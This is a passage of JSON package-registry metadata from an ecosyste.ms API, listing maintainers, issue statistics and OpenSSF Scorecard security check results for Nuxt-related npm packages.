sues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:18.372Z","updated_at":"2022-11-20T01:59:18.372Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:18.296Z","updated_at":"2022-11-20T01:59:18.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:18.338Z","updated_at":"2022-11-20T01:59:18.338Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:18.425Z","updated_at":"2022-11-20T01:59:18.425Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:07.396Z","updated_at":"2023-08-19T18:27:07.396Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11981243,"name":"@xc6pm/nuxt","ecosystem":"npm","description":"Nuxt is a free and open-source framework with an intuitive and extendable way to create type-safe, performant and production-grade full-stack web applications and websites with Vue.js.","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"xc6pm","versions_count":2,"first_release_published_at":"2025-08-05T19:46:28.817Z","latest_release_published_at":"2025-08-10T08:14:50.609Z","latest_release_number":"4.0.2-alpha.1","last_synced_at":"2026-05-11T01:23:07.435Z","created_at":"2025-08-05T19:46:47.188Z","updated_at":"2026-05-11T01:23:07.436Z","registry_url":"https://www.npmjs.com/package/@xc6pm/nuxt","install_command":"npm install @xc6pm/nuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.2-alpha.1","latest":"4.0.2-alpha.0"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:06.751Z","dependent_packages_count":0,"downloads":8,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.05990871139571,"dependent_packages_count":34.71475798382361,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":29.387333347609662},"purl":"pkg:npm/%40xc6pm/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@xc6pm/nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@xc6pm/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@xc6pm/nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosy